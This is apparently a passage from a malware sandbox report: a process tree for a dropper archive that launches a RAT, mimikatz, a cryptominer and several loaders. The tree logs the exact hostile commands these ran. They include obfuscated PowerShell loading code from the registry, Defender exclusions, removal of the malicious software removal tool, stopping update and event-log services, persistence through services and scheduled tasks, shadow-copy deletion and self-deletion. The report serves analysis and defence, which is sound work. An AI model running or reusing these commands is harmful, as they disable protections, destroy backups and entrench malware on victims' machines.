- Modifies security service
- Indicator Removal: Clear Windows Event Logs
PID:752
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:812
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1168
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:840 -
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵PID:2624
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CD20FE6D-52F6-422A-8A10-220800B94C19} S-1-5-18:NT AUTHORITY\System:Service:3⤵PID:628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+'AR'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](76)+''+[Char](77)+''+[Char](88)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4656
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:968
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:948
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1088
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1096
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:2020
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:3056
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"2⤵PID:1120
-
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4868 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5108
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
- Drops file in Windows directory
PID:3268
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:5116
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3348
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:4328
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:3696
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:3948
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe2⤵PID:4668
-
-
C:\ProgramData\Screenshots\Lightshot.exeC:\ProgramData\Screenshots\Lightshot.exe2⤵PID:3572
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:1612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2736
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1056
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:3376
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2568
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:3044
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:3088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:3228
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:688
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:4104
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:1152
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:4544
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2160
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:488
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:496
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1192 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"2⤵
- Quasar RAT
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2716
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2724
-
-
C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2068
-
-
-
-
C:\Users\Admin\Desktop\a\cbot.exe"C:\Users\Admin\Desktop\a\cbot.exe"4⤵PID:912
-
-
C:\Users\Admin\Desktop\a\Client.exe"C:\Users\Admin\Desktop\a\Client.exe"4⤵PID:1264
-
-
C:\Users\Admin\Desktop\a\svhost.exe"C:\Users\Admin\Desktop\a\svhost.exe"4⤵PID:1496
-
-
C:\Users\Admin\Desktop\a\mimikatz.exe"C:\Users\Admin\Desktop\a\mimikatz.exe"4⤵PID:4632
-
-
C:\Users\Admin\Desktop\a\123.exe"C:\Users\Admin\Desktop\a\123.exe"4⤵PID:3824
-
-
C:\Users\Admin\Desktop\a\xmrig.exe"C:\Users\Admin\Desktop\a\xmrig.exe"4⤵PID:4476
-
-
C:\Users\Admin\Desktop\a\chrtrome22.exe"C:\Users\Admin\Desktop\a\chrtrome22.exe"4⤵PID:1248
-
C:\Users\Admin\Desktop\a\._cache_chrtrome22.exe"C:\Users\Admin\Desktop\a\._cache_chrtrome22.exe"5⤵PID:3676
-
C:\Users\Admin\Desktop\a\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\a\voidware_loader.exe"6⤵PID:4668
-
-
C:\Users\Admin\Desktop\a\a\build.exe"C:\Users\Admin\Desktop\a\a\build.exe"6⤵PID:4052
-
-
C:\Users\Admin\Desktop\a\a\gem2.exe"C:\Users\Admin\Desktop\a\a\gem2.exe"6⤵PID:3060
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
PID:1364
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:4776
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:4792
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:1920
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:3576
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:4676
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:2340
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
PID:2640
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
PID:2336
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
PID:4316
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
PID:2200
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵PID:1860
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:4388
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"7⤵
- Launches sc.exe
PID:2324
-
-
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"6⤵PID:3824
-
C:\Users\Admin\Desktop\a\a\gem1.exe"C:\Users\Admin\Desktop\a\a\gem1.exe"7⤵PID:2296
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 5047⤵
- Program crash
PID:2228
-
-
-
-
-
C:\Users\Admin\Desktop\a\Fixer.exe"C:\Users\Admin\Desktop\a\Fixer.exe"4⤵PID:4456
-
-
C:\Users\Admin\Desktop\a\Client-built.exe"C:\Users\Admin\Desktop\a\Client-built.exe"4⤵PID:2316
-
-
C:\Users\Admin\Desktop\a\uu.exe"C:\Users\Admin\Desktop\a\uu.exe"4⤵PID:4116
-
-
C:\Users\Admin\Desktop\a\TEST.exe"C:\Users\Admin\Desktop\a\TEST.exe"4⤵PID:3424
-
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵PID:3956
-
\??\c:\Windows\system32\wbem\wmic.exec:\mnXbyI\mnXb\..\..\Windows\mnXb\mnXb\..\..\system32\mnXb\mnXb\..\..\wbem\mnXb\mnXby\..\..\wmic.exe shadowcopy delete5⤵PID:4420
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\WTOVCi\WTOV\..\..\Windows\WTOV\WTOV\..\..\system32\WTOV\WTOV\..\..\wbem\WTOV\WTOVC\..\..\wmic.exe shadowcopy delete5⤵PID:2676
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4464 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4324
-
-
-
-
C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"4⤵PID:5104
-
-
C:\Users\Admin\Desktop\a\albt.exe"C:\Users\Admin\Desktop\a\albt.exe"4⤵PID:2800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 7205⤵
- Program crash
PID:1452
-
-
-
C:\Users\Admin\Desktop\a\drop2.exe"C:\Users\Admin\Desktop\a\drop2.exe"4⤵PID:1744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:2768
-
-
C:\Windows\system32\SCHTASKS.exeSCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F5⤵
- Scheduled Task/Job: Scheduled Task
PID:4316
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe5⤵PID:1292
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"5⤵PID:228
-
-
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"4⤵PID:3248
-
C:\Users\Admin\Desktop\a\drop1.exe"C:\Users\Admin\Desktop\a\drop1.exe"5⤵PID:4532
-
-
-
C:\Users\Admin\Desktop\a\00.exe"C:\Users\Admin\Desktop\a\00.exe"4⤵PID:3604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3604 -s 1645⤵
- Program crash
PID:4808
-
-
-
C:\Users\Admin\Desktop\a\64.exe"C:\Users\Admin\Desktop\a\64.exe"4⤵PID:4272
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c color 0a5⤵PID:1604
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 9365⤵PID:3316
-
C:\Windows\system32\chcp.comchcp 9366⤵PID:4496
-
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2022.exe"4⤵PID:2640
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:336 -
C:\Users\Admin\Desktop\._cache_Synaptics.exe"C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Users\Admin\Desktop\a\build.exe"C:\Users\Admin\Desktop\a\build.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:580 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵PID:2056
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵
- Drops file in Windows directory
PID:2396
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
PID:2512
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:2256
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
PID:2768
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
PID:1484
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
PID:2320
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GeekBrains"6⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"6⤵
- Launches sc.exe
PID:4608
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:4716
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"6⤵
- Launches sc.exe
PID:4724
-
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1476
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 686⤵
- Loads dropped DLL
- Program crash
PID:292
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1376 -
C:\Users\Admin\Desktop\a\Steanings.exe"C:\Users\Admin\Desktop\a\Steanings.exe"4⤵PID:848
-
-
C:\Users\Admin\Desktop\a\AsyncClientGK.exe"C:\Users\Admin\Desktop\a\AsyncClientGK.exe"4⤵PID:4500
-
-
C:\Users\Admin\Desktop\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\a\RuntimeBroker.exe"4⤵PID:4464
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4792
-
-
C:\Windows\system32\a7\RuntimeBroker.exe"C:\Windows\system32\a7\RuntimeBroker.exe"5⤵PID:5044
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:1692
-
-
-
-
C:\Users\Admin\Desktop\a\sela.exe"C:\Users\Admin\Desktop\a\sela.exe"4⤵PID:4440
-
-
C:\Users\Admin\Desktop\a\01.exe"C:\Users\Admin\Desktop\a\01.exe"4⤵PID:2564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 1645⤵
- Program crash
PID:4696
-
-
-
C:\Users\Admin\Desktop\a\wudi.exe"C:\Users\Admin\Desktop\a\wudi.exe"4⤵PID:2700
-
-
C:\Users\Admin\Desktop\a\02.exe"C:\Users\Admin\Desktop\a\02.exe"4⤵PID:5060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 1645⤵
- Program crash
PID:2440
-
-
-
C:\Users\Admin\Desktop\a\32.exe"C:\Users\Admin\Desktop\a\32.exe"4⤵PID:4484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 1645⤵
- Program crash
PID:3276
-
-
-
C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"C:\Users\Admin\Desktop\a\sdggwsdgdrwgrwgrwgrwgrw.exe"4⤵PID:1000
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"4⤵PID:1592
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7feeca09758,0x7feeca09768,0x7feeca097783⤵PID:2356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1132 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:23⤵PID:2764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:83⤵PID:2912
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1560 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:83⤵PID:2352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2132 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:13⤵PID:1000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2140 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:13⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1636 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:23⤵PID:2576
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1300 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:13⤵PID:2324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3640 --field-trial-handle=1352,i,9321765255628052971,9412675858174359599,131072 /prefetch:83⤵PID:2416
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level3⤵PID:2000
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1401b7688,0x1401b7698,0x1401b76a84⤵PID:996
-
-
-
-
